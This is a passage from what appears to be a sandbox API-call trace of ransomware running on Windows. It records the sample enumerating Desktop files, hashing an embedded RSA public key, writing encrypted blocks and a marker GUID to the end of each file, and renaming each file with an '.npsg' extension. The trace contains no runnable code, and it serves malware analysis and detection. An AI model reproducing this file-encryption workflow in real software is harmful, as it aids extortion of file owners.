KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.203] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.204] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.204] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.204] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.205] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.205] GetLastError () returned 0x0 [0237.205] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.205] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.205] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.205] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.205] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.205] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.206] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf4c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.206] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0237.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.207] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.207] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.207] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.207] CloseHandle (hObject=0x644) returned 1 [0237.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b81cd0 [0237.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0237.211] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\32f7bhkCAEoSWPD2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\32f7bhkcaeoswpd2.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\32f7bhkCAEoSWPD2.rtf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\32f7bhkcaeoswpd2.rtf.npsg")) returned 1 [0237.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.212] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.213] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5862e20, ftCreationTime.dwHighDateTime=0x1d5ba4a, ftLastAccessTime.dwLowDateTime=0xcaa4a540, ftLastAccessTime.dwHighDateTime=0x1d5bc49, ftLastWriteTime.dwLowDateTime=0xcaa4a540, ftLastWriteTime.dwHighDateTime=0x1d5bc49, nFileSizeHigh=0x0, nFileSizeLow=0x13302, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B0SdFfhttCFqP53h.ods", cAlternateFileName="B0SDFF~1.ODS")) returned 1 [0237.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.213] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\B0SdFfhttCFqP53h.ods") returned=".ods" [0237.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\B0SdFfhttCFqP53h.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\b0sdffhttcfqp53h.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.215] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=78594) returned 1 [0237.215] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.218] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x132dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.218] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.219] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.220] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x13302, lpOverlapped=0x0) returned 1 [0237.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.221] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.222] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.222] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.222] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.222] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.222] GetLastError () returned 0x0 [0237.222] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.222] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.222] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.222] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.222] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13300) returned 0x3b95d50 [0237.223] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408e58 [0237.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004d0 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408ea0 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004e8 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.224] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400530 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400518 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.225] GetCurrentThreadId () returned 0x5b4 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b81ce8 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.225] GetCurrentThreadId () returned 0x5b4 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400530 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400500 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400590 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005a8 [0237.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400548 [0237.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400518 [0237.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.229] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13302, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.229] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.229] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.229] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.229] CloseHandle (hObject=0x644) returned 1 [0237.231] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\B0SdFfhttCFqP53h.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\b0sdffhttcfqp53h.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\B0SdFfhttCFqP53h.ods.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\b0sdffhttcfqp53h.ods.npsg")) returned 1 [0237.232] HeapFree (in: hHeap=0x620000, 